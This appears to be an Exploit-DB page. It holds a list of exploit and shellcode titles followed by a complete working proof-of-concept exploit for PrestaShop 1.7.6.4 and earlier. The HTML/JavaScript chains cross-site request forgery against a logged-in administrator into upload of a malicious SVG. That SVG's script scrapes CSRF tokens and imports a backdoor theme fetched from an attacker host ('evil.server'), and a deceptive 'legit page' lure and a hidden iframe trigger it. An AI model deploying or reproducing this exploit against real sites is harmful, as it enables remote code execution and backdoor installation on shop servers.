
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
121 lines
No EOL
5 KiB
Text
121 lines
No EOL
5 KiB
Text
<html>
|
|
|
|
<!--
|
|
|
|
# Exploit Title: Prestashop <= 1.7.6.4 single-click RCE exploit
|
|
# Date: 2020-04-11
|
|
# Exploit Author: Sivanesh Ashok | @sivaneshashok | stazot.com
|
|
# Vendor Homepage: https://www.prestashop.com/
|
|
# Version: 1.7.6.4 and below
|
|
# Tested on: Windows 10 / XAMPP / Prestashop v1.7.6.4
|
|
|
|
Prestashop <= 1.7.6.4 single-click RCE exploit
|
|
|
|
Written by Sivanesh Ashok | @sivaneshashok | stazot.com
|
|
|
|
For more details, visit https://stazot.com/prestashop-csrf-to-rce-article
|
|
|
|
Change the values of the 3 variables marked as "change this"
|
|
|
|
-->
|
|
|
|
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
|
|
|
<body>
|
|
|
|
<h3>This is totally a legit page. Just keep reading this for a minute :)</h3>
|
|
|
|
<script>history.pushState('', '', '/')</script>
|
|
<script>
|
|
var target = "http://localhost"; //change this
|
|
var admin_url = "/admin123ab45cd"; //change this
|
|
var theme_url = "http://evil.server/backdoor-theme.zip"; //change this - link to the malicious theme zip file
|
|
var xhr0 = new XMLHttpRequest();
|
|
xhr0.open("GET", target+admin_url+"/filemanager/dialog.php");
|
|
xhr0.withCredentials = true;
|
|
xhr0.send();
|
|
function submitRequest()
|
|
{
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.open("POST", target+admin_url+"/filemanager/upload.php", true);
|
|
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------6487332036660663652470259777");
|
|
xhr.withCredentials = true;
|
|
var body = "-----------------------------6487332036660663652470259777\r\n" +
|
|
"Content-Disposition: form-data; name=\"path\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"-----------------------------6487332036660663652470259777\r\n" +
|
|
"Content-Disposition: form-data; name=\"path_thumb\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"-----------------------------6487332036660663652470259777\r\n" +
|
|
"Content-Disposition: form-data; name=\"file\"; filename=\"exploit.svg\"\r\n" +
|
|
"Content-Type: image/svg+xml\r\n" +
|
|
"\r\n" +
|
|
"\x3csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\x3e\r\n" +
|
|
"\r\n" +
|
|
"\t\x3cscript xlink:href=\"https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js\"\x3e\x3c/script\x3e\r\n" +
|
|
"\t\r\n" +
|
|
"\t\x3cscript\x3e\r\n" +
|
|
"\t\r\n" +
|
|
"\t$.ajaxSetup({async: false});\r\n" +
|
|
"\r\n" +
|
|
"\tvar target = \'" + target + "\';\r\n" +
|
|
"\tvar admin_url = \'" + admin_url + "\';\r\n" +
|
|
"\tvar theme_url = \'" + theme_url + "\';\r\n" +
|
|
"\tvar import_url = \'\';\r\n" +
|
|
"\tvar import_token = \'\';\r\n" +
|
|
"\t\r\n" +
|
|
"\t$.get(target+admin_url+\'/index.php/improve/design/themes/import\', function( my_var0 ) {\r\n" +
|
|
"\t\r\n" +
|
|
"\t\tvar tmp = my_var0.match(/_token(.{44})/g);\r\n" +
|
|
"\t\ttmp = tmp.toString().split(\"=\");\r\n" +
|
|
"\t\ttmp = tmp[1];\r\n" +
|
|
"\t\timport_url = target+admin_url+\'/improve/design/themes/import?_token=\'+tmp;\r\n" +
|
|
"\r\n" +
|
|
"\t}, \'html\');\r\n" +
|
|
"\r\n" +
|
|
"\t$.get(import_url, function( my_var1 ) {\r\n" +
|
|
"\r\n" +
|
|
"\t\tvar tmp = my_var1.match(/import_theme__token(.{101})/g);\r\n" +
|
|
"\t\ttmp = tmp.toString().split(\' \');\r\n" +
|
|
"\t\ttmp = tmp[3].toString().split(\'=\\\"\');\r\n" +
|
|
"\t\timport_token = tmp[1];\r\n" +
|
|
"\r\n" +
|
|
"\t}, \'html\');\r\n" +
|
|
"\r\n" +
|
|
"\tvar themeUploadData = new FormData();\r\n" +
|
|
"\tthemeUploadData.append(\'import_theme[import_from_web]\', theme_url);\r\n" +
|
|
"\tthemeUploadData.append(\'import_theme[_token]\', import_token);\r\n" +
|
|
"\r\n" +
|
|
"\t$.ajax({\r\n" +
|
|
"\t\turl: import_url,\r\n" +
|
|
"\t\tdata: themeUploadData,\r\n" +
|
|
"\t\tcache: false,\r\n" +
|
|
"\t\tcontentType: false,\r\n" +
|
|
"\t\tprocessData: false,\r\n" +
|
|
"\t\tmethod: \'POST\'\r\n" +
|
|
"\t});\r\n" +
|
|
"\r\n" +
|
|
"\t\x3c/script\x3e\r\n" +
|
|
"\r\n" +
|
|
"\x3c/svg\x3e\r\n" +
|
|
"\r\n" +
|
|
"-----------------------------6487332036660663652470259777--\r\n";
|
|
var aBody = new Uint8Array(body.length);
|
|
for (var i = 0; i < aBody.length; i++)
|
|
aBody[i] = body.charCodeAt(i);
|
|
xhr.send(new Blob([aBody]));
|
|
}
|
|
window.setTimeout(function(){
|
|
submitRequest();
|
|
}, 1500);
|
|
window.setTimeout(function(){
|
|
var iframe = document.createElement('iframe');
|
|
iframe.style.display = "none";
|
|
iframe.src = target+"/img/cms/exploit.svg";
|
|
document.body.appendChild(iframe);
|
|
}, 4000);
|
|
</script>
|
|
</body>
|
|
</html> |